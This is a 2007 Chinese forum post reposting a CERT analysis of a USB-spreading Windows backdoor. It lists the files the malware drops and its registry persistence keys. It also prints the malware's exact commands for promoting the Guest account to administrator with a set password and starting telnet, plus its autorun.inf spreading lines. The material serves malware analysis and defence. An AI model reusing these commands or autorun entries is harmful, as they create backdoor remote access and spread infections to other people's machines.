| desertwolf2 发表于 2007-3-13 18:30 只看TA 1楼 |
|---|
|
|
[交流] 一个靠U盘传播的病毒 Backdoor.Win32.Agent.dfa安天CERT 一、 病毒标签: 病毒名称: Backdoor.Win32.Agent.dfa 病毒类型: 后门 文件 MD5: 74E51BA6ABEC64A48FF45EBEF14C9A45 公开范围: 完全公开 危害等级: 3 文件长度: 45,268 字节 感染系统: windows98以上版本 开发工具: Microsoft Visual Basic 5.0 / 6.0 加壳类型: 无 二、 病毒描述: 该病毒发现于****大学内,利用U盘、MP3等移动设备进行传播。病毒内含QQ65409685、llm is my son等信息,病毒在%system32%下生成fuck you.txt 的文本文档,内容为:Powered by LLM, QQ:65409685。经推断病毒作者并非QQ号为65409658的使用者,而是一种嫁祸行为。病毒运行后每隔60秒会黑屏一秒,黑屏是专门设计的窗体,黑屏时不能进行输入输出的操作等,并且在重启机后也会有黑屏现象。该病毒提升用户Guest权限为管理员级,并设置密码,启动telnet服务,可以远程控制用户计算机,但由于病毒作者设计上的漏洞,如果telnet服务本身被禁止的话是启动不了telnet服务的,并且需要NtLmSsp服务的支持。修改计算机系统名为:QQ65409685。病毒复制自身到多个目录下,在注册表中添加了三处启动项,但由于格式错误,只有run键下的可以随机启动。在windows XP系统下,重新启动后无法使用鼠标双击和右键打开"本地磁盘"。 三、 行为分析: 1、病毒运行后复制自身并衍生病毒文件: 系统根目录下\ llm.exe 系统根目录下\ AutoRun.inf %system32%\advanced.exe %system32%\fuck you.txt %system32%\dllcache\dcache.exe %system32%\Microsoft\蠽.exe 2、修改注册表,添加启动项,以达到随开机启动的目的: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ 键值: 字串: "system.exe"="C:\WINDOWS\system32\advanced.exe" 3、由于格式错误,对以下注册表项的修改并未实现作用: 修改的注册表项: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Winlogon 新建键值: 字串: "Shell"="Explorer.exe "C:\WINDOWS\system32\dllcache\ dcache.exe"" 原键值: 字串: "Shell"="Explorer.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Winlogon\ 新建键值: 字串: "Userinit"="C:\WINDOWS\system32\userinit.exe,microsoft\蠽.exe" 原键值: 字串: "Userinit"="C:\WINDOWS\system32\userinit.exe," 4、修改计算机系统名为QQ65409685: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ComputerName\ 新建键值: 字串: "ComputerName"="QQ65409685" 原键值: 字串: "ComputerName"="(原计算机系统名)" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ 新建键值: 字串: "ComputerName"="QQ65409685" 原键值: 字串: "ComputerName"="(原计算机系统名)" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ 新建键值: 字串: "CheckedValue"="0" 原键值: 字串: "CheckedValue"="1" 5、提升用户Guest权限为管理员级,并设置密码,启动telnet服务: net user guest llmismyson net user guest /active:yes net localgroup administrators guest /add net localgroup guests guest /del net start telnet /y 6、利用U盘、MP3等移动设备进行传播: OPEN=llm.exe shell\open=打开(&O) shell\open\Command=llm.exe shell\open\Default=1 shell\explore=资源管理器(&X) shell\explore\Command=llm.exe 7、在windows XP系统下、重新启动后无法使用鼠标双击和右键打开"本地磁盘"。 注:% System%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。 |
| 0 |
|
|---|
| 作者的其他主题 |
|---|
| Win XP的一些防范安全策略 |
| 一个靠U盘传播的病毒 |
